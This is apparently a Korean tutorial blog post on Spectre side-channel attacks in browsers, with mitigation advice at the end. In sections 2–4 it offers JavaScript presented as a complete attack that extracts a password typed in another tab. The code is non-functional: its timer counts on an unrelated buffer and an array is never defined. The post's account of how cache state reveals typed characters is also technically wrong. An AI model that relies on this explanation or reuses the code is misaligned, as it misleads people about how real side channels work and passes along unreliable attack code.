📎

웹에서의 Spectre 공격 이해하기

1. 웹 환경에서의 Spectre(스펙터) 공격

Spectre 공격이란 무엇인가

Spectre 공격은 CPU의 추측 실행(Speculative Execution) 기능을 악용하여 메모리에서 민감한 정보를 탈취하는 사이드 채널 공격입니다. 2018년 공개된 이 공격은 하드웨어 수준의 취약점을 이용하기 때문에 운영체제나 애플리케이션의 보안 경계를 우회할 수 있습니다.
웹 환경에서는 악성 웹사이트의 JavaScript 코드가 사용자 브라우저에서 실행되어 다른 탭이나 웹사이트의 데이터를 관찰할 수 있습니다. 공격자는 사용자가 입력한 패스워드, 개인정보, 쿠키 등의 민감한 데이터에 간접적으로 접근할 수 있게 됩니다.

웹 서비스 보안에 미치는 영향

기존 웹 보안 모델은 서로 다른 웹사이트 간의 완전한 격리를 전제로 합니다. 하지만 Spectre 공격은 이러한 격리 메커니즘을 우회합니다.
공격 가능한 정보는 다음과 같습니다.
  • 다른 탭에서 입력한 비밀번호나 개인정보
  • 다른 웹사이트의 쿠키나 세션 정보
  • 사용자의 브라우징 패턴이나 방문 기록
  • 메모리에 로드된 이미지나 문서의 일부
Same-Origin Policy나 Content Security Policy 같은 기존 웹 보안 정책으로는 이 공격을 막을 수 없습니다. 공격자는 단순히 사용자를 악성 웹사이트로 유도하는 것만으로도 다른 온라인 활동을 감시할 수 있습니다.

2. SharedArrayBuffer로 이해하는 Spectre 공격 원리

CPU 캐시와 메모리 접근 시간 차이

현대 CPU는 성능 향상을 위해 다단계 캐시 메모리를 사용합니다. 자주 사용되는 데이터는 빠른 캐시에 저장되고, 그렇지 않은 데이터는 느린 메인 메모리에서 가져옵니다.
캐시 히트: ~1-4 나노초 (빠름)
캐시 미스: ~100-300 나노초 (느림)
이 접근 시간 차이가 Spectre 공격의 핵심입니다. 탭1에서 "password123"을 입력하면 각 문자가 CPU 캐시에 올라갑니다. 탭2에서 'p', 'a', 's' 등에 접근하면 캐시 히트로 빠른 응답을 보이지만, 사용되지 않은 문자는 캐시 미스로 느린 응답을 보입니다.

SharedArrayBuffer를 이용한 정밀 타이밍 측정

JavaScript의 performance.now()는 보안상 마이크로초 단위의 정밀도를 제공하지 않습니다. 하지만 SharedArrayBuffer를 사용하면 나노초 단위까지 측정할 수 있는 고해상도 타이머를 구현할 수 있습니다.

캐시 히트/미스 판별을 통한 정보 추출

정밀한 타이밍 측정을 통해 특정 메모리 주소의 캐시 상태를 확인할 수 있습니다. 이를 통해 다른 프로세스나 탭에서 어떤 데이터를 사용했는지 추론할 수 있습니다.

코드 예시: 정밀 타이머 구현과 캐시 상태 측정

// SharedArrayBuffer를 이용한 고해상도 타이머
class PrecisionTimer {
    constructor() {
        this.sharedBuffer = new SharedArrayBuffer(16);
        this.counterArray = new Int32Array(this.sharedBuffer);

        // Web Worker에서 카운터 실행
        const worker = new Worker(URL.createObjectURL(new Blob([`
            while (true) Atomics.add(new Int32Array(new SharedArrayBuffer(16)), 0, 1);
        `], { type: 'application/javascript' })));
    }

    now() {
        return Atomics.load(this.counterArray, 0);
    }
}

// 캐시 상태 분석기
class CacheAnalyzer {
    constructor() {
        this.timer = new PrecisionTimer();
        this.threshold = 50; // 캐시 히트/미스 구분 임계값
    }

    checkCacheState(character) {
        const measurements = [];

        for (let i = 0; i < 100; i++) {
            const start = this.timer.now();
            this.accessMemory(character);
            measurements.push(this.timer.now() - start);
        }

        const avgTime = measurements.reduce((a, b) => a + b) / measurements.length;
        return avgTime < this.threshold; // 캐시 히트 여부
    }

    accessMemory(character) {
        const memoryIndex = character.charCodeAt(0) * 64;
        this.dummyArray[memoryIndex] = this.dummyArray[memoryIndex] + 1;
    }
}

3. 웹 브라우저의 메모리 격리 취약점

브라우저 탭 간 메모리 공유 구조

현대 웹 브라우저는 보안을 위해 각 탭을 별도 프로세스로 분리하려 하지만, 성능상의 이유로 완전한 격리는 어렵습니다. 메모리 공유가 발생하는 경우는 다음과 같습니다.
  • 동일한 도메인의 여러 탭
  • 리소스가 제한된 환경에서의 프로세스 재사용
  • 확장 프로그램이나 플러그인을 통한 공유
이러한 메모리 공유는 CPU 캐시 레벨에서도 발생하며, 이것이 Spectre 공격의 주요 경로가 됩니다.

Same-Origin Policy 우회 가능성

Same-Origin Policy는 서로 다른 도메인의 웹사이트가 서로의 데이터에 직접 접근하는 것을 막습니다. 하지만 Spectre 공격은 메모리와 캐시 상태를 간접적으로 관찰하는 방식이므로 이러한 정책을 우회할 수 있습니다.
공격자는 다른 사이트의 데이터에 직접 접근하지 않고, 캐시 상태 변화를 통해 간접적으로 정보를 추론합니다. 이는 기존 보안 모델이 고려하지 못했던 공격 벡터입니다.

코드 예시: 탭 간 메모리 상태 확인

// 다른 탭의 활동 감지
class CrossTabAnalyzer {
    constructor() {
        this.cacheAnalyzer = new CacheAnalyzer();
        this.commonChars = 'abcdefghijklmnopqrstuvwxyz0123456789';
    }

    // 캐시 상태 스냅샷 생성
    async takeCacheSnapshot() {
        const snapshot = {};
        for (const char of this.commonChars) {
            snapshot[char] = this.cacheAnalyzer.checkCacheState(char);
        }
        return snapshot;
    }

    // 다른 탭에서의 입력 활동 모니터링
    async detectActivity() {
        const before = await this.takeCacheSnapshot();
        await new Promise(resolve => setTimeout(resolve, 100));
        const after = await this.takeCacheSnapshot();

        const newlyAccessed = [];
        for (const char in after) {
            if (!before[char] && after[char]) {
                newlyAccessed.push(char);
            }
        }

        return newlyAccessed;
    }
}

4. 실제 공격 구현

패스워드 추출 공격 메커니즘

Spectre 공격을 통한 패스워드 추출 과정은 다음과 같습니다.
  1. 준비 단계 공격자 웹사이트에서 고해상도 타이머와 캐시 분석기 초기화
  1. 모니터링 단계 다른 탭의 캐시 상태를 지속적으로 관찰
  1. 패턴 분석 단계 캐시 히트 패턴을 통해 사용된 문자들 식별
  1. 순서 추론 단계 시간 순서와 통계적 분석을 통해 실제 패스워드 복원

문자별 캐시 분석을 통한 데이터 복원

패스워드와 같은 순차적 입력 데이터는 시간에 따른 캐시 히트 패턴 분석으로 복원 가능합니다. 각 문자가 입력될 때마다 해당 문자의 캐시 히트율이 증가하며, 이를 시간 순서대로 추적하면 원본 문자열을 재구성할 수 있습니다.

코드 예시: 완전한 공격 코드와 분석

// Spectre 공격 구현
class SpectreAttack {
    constructor() {
        this.cacheAnalyzer = new CacheAnalyzer();
        this.crossTabAnalyzer = new CrossTabAnalyzer();
    }

    // 패스워드 추출 공격
    async extractPassword() {
        console.log('패스워드 추출 시작...');
        const password = [];
        const testChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

        // 각 위치별로 문자 추출
        for (let position = 0; position < 10; position++) {
            const candidates = {};

            // 모든 가능한 문자에 대해 캐시 히트율 측정
            for (const char of testChars) {
                let hitCount = 0;
                for (let i = 0; i < 50; i++) {
                    if (this.cacheAnalyzer.checkCacheState(char)) {
                        hitCount++;
                    }
                }
                candidates[char] = hitCount / 50; // 히트율
            }

            // 가장 높은 히트율을 가진 문자 선택
            const bestChar = Object.entries(candidates)
                .sort(([,a], [,b]) => b - a)[0];

            if (bestChar[1] > 0.7) { // 신뢰도 70% 이상
                password.push(bestChar[0]);
                console.log(`Position ${position}: ${bestChar[0]}`);
            } else {
                break;
            }
        }

        return password.join('');
    }
}

// 공격 실행
const attack = new SpectreAttack();
attack.extractPassword().then(result => {
    console.log('추출된 패스워드:', result);
});

5. 보안 대응책

SharedArrayBuffer 비활성화

2018년 Spectre 공격이 공개된 후, 주요 브라우저들은 SharedArrayBuffer API를 비활성화했습니다. 이는 고해상도 타이밍 공격을 차단하는 방법 중 하나입니다.
현재 SharedArrayBuffer 사용 조건은 다음과 같습니다.
  • HTTPS 환경에서만 동작
  • Cross-Origin-Embedder-Policy: require-corp 헤더 설정
  • Cross-Origin-Opener-Policy: same-origin 헤더 설정
이러한 제한을 통해 악의적인 웹사이트가 SharedArrayBuffer를 악용하는 것을 어렵게 만들고 있습니다.

Site Isolation 기술

Spectre 공격의 핵심은 같은 프로세스 내의 다른 애플리케이션 메모리를 읽을 수 있다는 점입니다. 이를 해결하기 위해 Google Chrome은 Site Isolation이라는 프로세스 단위 격리 기술을 구현했습니다.
기존 브라우저 구조의 문제점
  • 여러 탭이 하나의 프로세스에서 실행
  • 같은 프로세스 내에서 다른 탭의 메모리에 접근 가능
  • Spectre 공격으로 프로세스 내 모든 데이터 탈취 위험
Site Isolation의 해결 방식
  • 각 도메인별로 독립된 프로세스 할당
  • 프로세스 간 메모리 완전 격리
  • 크로스-오리진 프레임도 별도 프로세스에서 실행
이 프로세스 단위 격리를 통해 Spectre 공격의 공격 범위를 대폭 축소시킬 수 있습니다. 공격자가 악성 웹사이트를 통해 Spectre 공격을 시도하더라도, 같은 프로세스 내에 다른 웹사이트의 데이터가 존재하지 않으므로 탈취할 수 있는 정보가 제한됩니다.
이러한 보안 대응책들을 통해 Spectre 공격의 위험성을 줄일 수 있습니다. 웹 개발자들은 지속적으로 보안 업데이트를 적용하고, 사용자들은 최신 버전의 브라우저를 사용하는 것이 중요합니다.
 
사실 브라우저 프로세스 격리의 필요성은 2000년대부터 보안 연구자들 사이에서 제기되어 왔습니다. 하지만 성능 저하, 메모리 사용량 증가, 기술적 복잡성 등의 현실적 제약으로 인해 완전한 격리 구현은 계속 미뤄졌습니다. 당시에는 "이론적 위험"일 뿐 실제 공격 사례가 없었기 때문입니다.
2018년 Spectre 공격이 공개되자 상황이 완전히 바뀌었습니다. 이론적 위험이 실제 공격으로 입증되면서 업계 전체가 "성능보다 보안"으로 우선순위를 전환했습니다. Chrome은 즉시 Site Isolation을 활성화했고, 다른 브라우저들도 서둘러 따라잡기 시작했습니다.
이 사례는 보안 분야에서 자주 반복되는 패턴을 보여줍니다. 기술적으로는 훨씬 일찍 해결할 수 있었지만, 현실적 제약과 위험도 인식 부족으로 미뤄지다가 실제 공격이 나타나고 나서야 급하게 대응하는 전형적인 사례라 할 수 있습니다.
 
멜트다운/스펙터  |  Blog  |  Chrome for Developers
웹 개발자 및 Chrome의 완화 조치에 미치는 영향
멜트다운/스펙터  |  Blog  |  Chrome for Developers
https://developer.chrome.com/blog/meltdown-spectre?hl=ko